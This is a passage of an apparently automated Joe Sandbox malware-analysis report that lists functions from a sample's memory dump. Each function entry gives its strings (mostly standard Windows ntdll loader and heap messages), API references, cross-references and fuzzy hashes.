Instruction Fuzzy Hash: 4D926D71608341AFE311CF24C992F6EBBE8BB84754F20891DFA94DB251D7B4E944CB92

Function 22558620 Relevance: 17.7, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 225952E3
Thread is in a state in which it cannot own a critical section, xrefs: 22595543
Critical section debug info address, xrefs: 2259541F, 2259552E
Address of the debug info found in the active list., xrefs: 225954AE, 225954FA
Invalid debug info address of this critical section, xrefs: 225954B6
Critical section address, xrefs: 22595425, 225954BC, 22595534
Critical section address., xrefs: 22595502
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2259540A, 22595496, 22595519
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 225954E2
double initialized or corrupted critical section, xrefs: 22595508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 225954CE
undeleted critical section in freed memory, xrefs: 2259542B
corrupted critical section, xrefs: 225954C2
Thread identifier, xrefs: 2259553A

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 64c3bc8f5197c686d51c3b060286d37b6af99e84fdf4fad72c9fdb5b52d5f087
Instruction ID: d27a61d1fc7a1bbde199827eeee2c5a784aad776dea58bf4cce1df218b2d1ca1
Opcode Fuzzy Hash: 64c3bc8f5197c686d51c3b060286d37b6af99e84fdf4fad72c9fdb5b52d5f087
Instruction Fuzzy Hash: A0815BB1A00758AFEB10CF94CD84FAEBBF5EB48714F60851AF508B7241D779AA51CB90

Function 225D0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 225D02A8

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 225D069F
About to reallocate block at %p to %Ix bytes, xrefs: 225D03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 225D04D3
RtlReAllocateHeap, xrefs: 225D02BF, 225D0362
HEAP: , xrefs: 225D03A6, 225D04B5, 225D05DD, 225D0682, 225D06D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 225D06EA
HEAP[%wZ]: , xrefs: 225D0399, 225D04A8, 225D05D0, 225D0675, 225D06CC
Just reallocated block at %p to %Ix bytes, xrefs: 225D05F1

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 01fb5a66786e4f2bf9f1bd53f49db3595cf1d880aad9123c369e7df594877041
Instruction ID: 79b1a358f7dc9c8a2458c9050f6e91b84f62f2990eea76cf0102e8cd3b4f1e68
Opcode Fuzzy Hash: 01fb5a66786e4f2bf9f1bd53f49db3595cf1d880aad9123c369e7df594877041
Instruction Fuzzy Hash: 0DD19736600785EFDB12DFA8C440AAEBBF1EF9A314F18C55AE8459B656C734E981CB10

Function 225529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 225925EB
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 22592412
RtlpResolveAssemblyStorageMapEntry, xrefs: 2259261F
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 22592498
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 225922E4
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 22592409
@, xrefs: 2259259B
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 225924C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 22592506
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 22592624
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 22592602

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 808378e7db37a53f36ea8d468a6ff53c7700ed1b0649697cb7e12cd4da566e2a
Instruction ID: ea48e55fe526a5fc63d340a11c104696bfecd6e27a3f5dc2d5e1dc8064c0be24
Opcode Fuzzy Hash: 808378e7db37a53f36ea8d468a6ff53c7700ed1b0649697cb7e12cd4da566e2a
Instruction Fuzzy Hash: 120230B1D043289BDB21CB14CD80BDAB7B8AF55314F4085DAA64CE7242EB719F94CF99

Function 225C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

csrss.exe, xrefs: 225C8B80
smss.exe, xrefs: 225C8B8B
services.exe, xrefs: 225C8B96
lsass.exe, xrefs: 225C8BA1
SegmentHeap, xrefs: 225C8BE9
svchost.exe, xrefs: 225C8B68
DefaultBrowser_NOPUBLISHERID, xrefs: 225C8D00
heapType, xrefs: 225C8BCB
runtimebroker.exe, xrefs: 225C8B73
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 225C8BD0

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 81f44ce7b5258da468812a3d399f17e69fff314ee84301dfdf7b30eecfdbc955
Instruction ID: 81c58c9c06d70356ea5c5e18a7f23bfcb36e08e89f8a027bb1cedac6262e66fe
Opcode Fuzzy Hash: 81f44ce7b5258da468812a3d399f17e69fff314ee84301dfdf7b30eecfdbc955
Instruction Fuzzy Hash: A251BF715153419BC326CF58CA88BABBBE8EFD4354F508A1EE95987240F778D604CB92

Function 2252EA80 Relevance: 9.8, Strings: 7, Instructions: 1073COMMON

Download Yara Rule

Strings

{, xrefs: 22584643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 2252EB6C
, xrefs: 2252F299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 2252EB58
`VO", xrefs: 2252F5BF, 2252F67A
R, xrefs: 2252EB62
T, xrefs: 2252EB4E

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`VO"${
API String ID: 0-3732041115
Opcode ID: 1a6b075ba547e33850aa9290172c76f545a8372d8c8d562526b91e8c67103ff8
Instruction ID: f7d274a455051da37471d3605a1abd5ff986a50b596262d077d13b87b6205cc8
Opcode Fuzzy Hash: 1a6b075ba547e33850aa9290172c76f545a8372d8c8d562526b91e8c67103ff8
Instruction Fuzzy Hash: 94A23674A05B698FDB64CF19C998B99BBB5FF85304F1082E9D908A7290DB709EC1CF41

Function 225A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierFlags, xrefs: 225A8C50
VerifierDlls, xrefs: 225A8CBD
VerifierDebug, xrefs: 225A8CA5
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 225A8A3D
HandleTraces, xrefs: 225A8C8F
AVRF: -*- final list of providers -*- , xrefs: 225A8B8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 225A8A67

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 5683bd4201843e0edc2bc1e565939c97c76a98b6aa327a970d8fc87354bc5cf7
Instruction ID: 792a4f61f96551913d6d48f6446d3ec565b188e0959544c4ed96b0a6dcc03dd2
Opcode Fuzzy Hash: 5683bd4201843e0edc2bc1e565939c97c76a98b6aa327a970d8fc87354bc5cf7
Instruction Fuzzy Hash: A7911272642315AFD311CF68C9E6B1EBBA4AF94714F80C95AEA416B390C738ED40CBD1

Function 2254245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2258A992
TGO", xrefs: 22542462
LdrpDynamicShimModule, xrefs: 2258A998
minkernel\ntdll\ldrinit.c, xrefs: 2258A9A2

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGO"$minkernel\ntdll\ldrinit.c
API String ID: 0-196501272
Opcode ID: 028712032687b7a5c0153ccbda0b505f8d413f5a490143e713d7f783d71ce5d3
Instruction ID: 681ee9f0826c055b9270af8e87aacbbe2d73a2b39d4e326ede1237b824f61536
Opcode Fuzzy Hash: 028712032687b7a5c0153ccbda0b505f8d413f5a490143e713d7f783d71ce5d3
Instruction Fuzzy Hash: AC310736A40311ABD7118F58C980F6EBBB4FBC4704F26855AF901AB359C7B8A9C1CB91

Function 225563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 2259413A
_LdrpInitialize, xrefs: 225940DF, 22594141, 22594205, 2259425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 225940D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 225941FE
minkernel\ntdll\ldrinit.c, xrefs: 225940E9, 2259414B, 2259420F, 22594269
Delaying execution failed with status 0x%08lx, xrefs: 22594258

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 63a4c01fb1e3ba3c5a5db969a0a6923998f7767e4f3a29a9afedd81b8250fcf7
Instruction ID: ef16891020fd3e74ec20315a980e898b3f3342b9361298f6acdc4be46f07495f
Opcode Fuzzy Hash: 63a4c01fb1e3ba3c5a5db969a0a6923998f7767e4f3a29a9afedd81b8250fcf7
Instruction Fuzzy Hash: 66910331A41391DBEB158F50CA84B6E7BE0EF85728F10C52AE900AB389D778E851CBD5

Function 22552674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22592178
RtlGetAssemblyStorageRoot, xrefs: 22592160, 2259219A, 225921BA
SXS: %s() passed the empty activation context, xrefs: 22592165
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2259219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22592180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 225921BF

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 5f862afce9a6ffadd73f11e40bfa76c43895d51eac1e04aa7896a1aed55127f6
Instruction ID: 01bdb167194a833d869fa9ae9f2ba88976807fa3b2fb6b9a5285036a24830d2d
Opcode Fuzzy Hash: 5f862afce9a6ffadd73f11e40bfa76c43895d51eac1e04aa7896a1aed55127f6
Instruction Fuzzy Hash: A231E236A003147BE711CA95CD80F9B7B78DFA9B94F05C15ABA04E7244D6B0DA10DBE1

Function 2255C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 225981E5
LdrpInitializeImportRedirection, xrefs: 22598177, 225981EB
LdrpInitializeProcess, xrefs: 2255C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 22598181, 225981F5
minkernel\ntdll\ldrinit.c, xrefs: 2255C6C3
Loading import redirection DLL: '%wZ', xrefs: 22598170

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: b9f34cffa36fb32af037378ffcb107fb48dbd51dd9cd077ec93e5e9c06a4a9d9
Instruction ID: 0fecc8e42606281e28885cd73dfa6ae1a77132109a7895e9a8db0105b298bdd3
Opcode Fuzzy Hash: b9f34cffa36fb32af037378ffcb107fb48dbd51dd9cd077ec93e5e9c06a4a9d9
Instruction Fuzzy Hash: 8131F272644351AFD310DF28CE85E2EBBD4EFD4714F008959F941AB291EA64ED04C7E2

Function 22530770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 225850CA
HEAP: , xrefs: 225850BD
HEAP[%wZ]: , xrefs: 225850AE

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: b6cf0e6045d7b10194ac976e3447cc066986775806b3a68abb566fa717e2d7a8
Instruction ID: 9adfba9918fb9729c58e3dc1e7a11738eaa985b2437dc36be48f0e22026148b0
Opcode Fuzzy Hash: b6cf0e6045d7b10194ac976e3447cc066986775806b3a68abb566fa717e2d7a8
Instruction Fuzzy Hash: D1F18B31A00705DFDB16CF68C990F6ABBB6FF84304F108669E5469B391D774EA81CB91

Function 22540BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22540CDC

Strings

Failed to allocated memory for shimmed module list, xrefs: 2258A10F
LdrpCheckModule, xrefs: 2258A117
minkernel\ntdll\ldrinit.c, xrefs: 2258A121

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 37179fed24b3b5b32dfd020965e927606f015b0ee222267ac994f743435f5ef3
Instruction ID: e55d7021d6f8539879c7e2110578a8ac389a4585916ab740b98ce95e59b0f39d
Opcode Fuzzy Hash: 37179fed24b3b5b32dfd020965e927606f015b0ee222267ac994f743435f5ef3
Instruction Fuzzy Hash: EE718F75E00305DBDB08DF68C984BBEF7F4EF88304F248469E9019B655EB78AA85CB51

Function 2255C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2255C7BF

Strings

Failed to reallocate the system dirs string !, xrefs: 225982D7
LdrpInitializePerUserWindowsDirectory, xrefs: 225982DE
minkernel\ntdll\ldrinit.c, xrefs: 225982E8

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 296e84b7b9a63a382c02912503862573df72af57bc98b81ee23e1702a55a68ae
Instruction ID: 4c91c1c8a5b7c4b6bf783f925ad579e64a4efbfbe8ca91be30b0054d17bef00e
Opcode Fuzzy Hash: 296e84b7b9a63a382c02912503862573df72af57bc98b81ee23e1702a55a68ae
Instruction Fuzzy Hash: A241D272565300ABD721DB64CD84B6F7BE8EF88750F10892BB944D7254EB78E850CBD2

Function 225A4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225A4809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 225A4888
minkernel\ntdll\ldrredirect.c, xrefs: 225A4899
LdrpCheckRedirection, xrefs: 225A488F

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 4258a3c15ec75f76679cb5f7dc65bd172782560ad127b70017a90ac23b8a1f1c
Instruction ID: 36770b01bc4eb309ff57bc082fcedb8e5c683dbe0d746b1987d374fa46e867dd
Opcode Fuzzy Hash: 4258a3c15ec75f76679cb5f7dc65bd172782560ad127b70017a90ac23b8a1f1c
Instruction Fuzzy Hash: 4841C332A013D19FCB11CEA8EA62E1E7BE5EF89660F018669ED4497311D730E801CB91

Function 2256096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 22562DF0: LdrInitializeThunk.NTDLL ref: 22562DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22560BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22560BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22560D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22560D74

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: c18d69fa736aed6b3f0f9ef6b4d1e458943b39fa6c13f5bba0dc95dbe1ab03e1
Instruction ID: b0f52734269d4238a013b565c2cea354176d7f6773411f81ccd0795e3ed9acce
Opcode Fuzzy Hash: c18d69fa736aed6b3f0f9ef6b4d1e458943b39fa6c13f5bba0dc95dbe1ab03e1
Instruction Fuzzy Hash: D24249719007159FDB20CF64C980BAABBF5FF44314F1485AAE999DB241E770EA84CFA1

Function 225A4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

/, xrefs: 225A4F6D
\microsoft.system.package.metadata\Application, xrefs: 225A5158
.Local, xrefs: 225A5170
\, xrefs: 225A4F66
.DLL, xrefs: 225A50C7, 225A519C

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: d445800e574ed25865dd1daa678b967eac44ee298b990f4ab0a22314d586dab6
Instruction ID: 51811c143bc91bf9b3c1f594a8b34e8b988fa61cf30a124646bd9a67d5afc26c
Opcode Fuzzy Hash: d445800e574ed25865dd1daa678b967eac44ee298b990f4ab0a22314d586dab6
Instruction Fuzzy Hash: 89919D72D007198BCB11CF98C992ABEBBB0FF88314F558169E950E7350E735DA41CB90

Function 225FB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225FB329
RtlDebugPrintTimes.NTDLL ref: 225FB605

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
